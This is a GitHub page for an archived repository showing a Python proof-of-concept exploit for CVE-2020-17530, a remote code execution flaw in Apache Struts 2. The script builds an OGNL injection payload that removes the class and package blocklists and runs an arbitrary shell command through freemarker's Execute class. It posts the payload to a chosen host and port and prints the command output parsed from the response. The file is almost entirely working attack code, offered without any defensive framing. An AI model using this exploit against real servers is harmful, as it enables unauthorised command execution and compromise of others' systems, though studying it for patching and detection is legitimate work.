This repository has been archived by the owner on Mar 7, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathCVE-2020-17530.py
43 lines (34 loc) · 2.01 KB
/
CVE-2020-17530.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/usr/bin/env python
import argparse
import requests
from bs4 import BeautifulSoup
def build_payload(command):
return '%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("' + command + '")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}'
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--command', help='command', default='whoami', type=str)
parser.add_argument('-n', '--name', help='form data name', default='id', type=str)
parser.add_argument('-p', '--port', help='port', default=80, type=int)
parser.add_argument('-t', '--target', help='target', default='localhost', type=str)
parser.add_argument('-u', '--uri', help='uri', default='/', type=str)
return parser
def main():
parser = get_parser()
args = vars(parser.parse_args())
command, name, port, target, uri = args['command'], args['name'], args['port'], args['target'], args['uri']
if port == 80:
base_url = f'http://{target}'
elif port == 443:
base_url = f'https://{target}'
else:
base_url = f'http://{target}:{port}'
if not uri.startswith('/'):
uri = '/' + uri
try:
r = requests.post(base_url + uri, files={name: (None, build_payload(command))})
except requests.exceptions.RequestException as e:
print(e); return
soup = BeautifulSoup(r.text, 'html.parser')
print(soup.find('a').attrs[name].strip())
if __name__ == '__main__':
main()